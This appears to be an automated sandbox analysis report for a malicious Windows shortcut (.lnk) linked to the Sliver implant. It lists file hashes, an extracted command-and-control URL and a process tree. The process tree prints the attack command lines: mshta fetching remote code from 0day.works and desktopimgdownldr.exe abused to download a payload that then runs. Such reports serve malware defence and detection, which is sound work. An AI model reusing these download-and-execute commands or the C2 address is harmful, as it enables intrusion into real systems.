Analysis
-
max time kernel
96s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
29/11/2024, 04:19
General
-
Target
f35bc7fcf73829f246b7c900600d04ceb38812f5407970daa1c5dfe1954ff478.lnk
-
Size
1KB
-
MD5
95bfcc2eac48c76681aa2d97a5674201
-
SHA1
f72d50b2bba6e479ec106ae2f6fe993ab6eef99a
-
SHA256
f35bc7fcf73829f246b7c900600d04ceb38812f5407970daa1c5dfe1954ff478
-
SHA512
952485dbd0096257ab62ef2fa684d1333fa1e495ad29d8e7a8aaa41d6b316abb48ca5ad2c1b704db7e5bc346a8350039a059c7d5ad323b072ecd3911ac4c5925
Malware Config
Extracted
https://0day.works/a
Signatures
-
Sliver RAT v2 1 IoCs
-
Sliver family
-
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
-
Blocklisted process makes network request 3 IoCs
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 1 IoCs
-
Drops file in Windows directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs
-
Suspicious use of WriteProcessMemory 13 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\f35bc7fcf73829f246b7c900600d04ceb38812f5407970daa1c5dfe1954ff478.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://0day.works/a2⤵
- Blocklisted process makes network request
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c set "SYSTEMROOT=C:\Windows\Temp" && desktopimgdownldr.exe /deskimgurl:https://0day.works/null /eventName:desktopimgdownldr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\desktopimgdownldr.exedesktopimgdownldr.exe /deskimgurl:https://0day.works/null /eventName:desktopimgdownldr4⤵
-
-
-
C:\Windows\Tasks\TapiUnattend.exe"C:\Windows\Tasks\TapiUnattend.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\TapiUnattend.exeC:\Windows\System32\TapiUnattend.exe4⤵
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
15KB
MD5b574abf43dcc57a359129d1adb4cdda0
SHA16fb0f79d9a7f0108ff817ee418e3436cc51393b5
SHA2566a960edad235f685e741e0f1a74d1162fd3cf410862192236f962ae289f0886e
SHA512a82831945726b02e56a843288039d5770f926615dde410653eda33a90bdf00b5c9492dd8483d97f2798009e8f38453c3089853495e1af2a8276bba7ebce51b78
-
Filesize
2.0MB
-
Filesize
17.0MB
-
Filesize
2.0MB
-
Filesize
26.8MB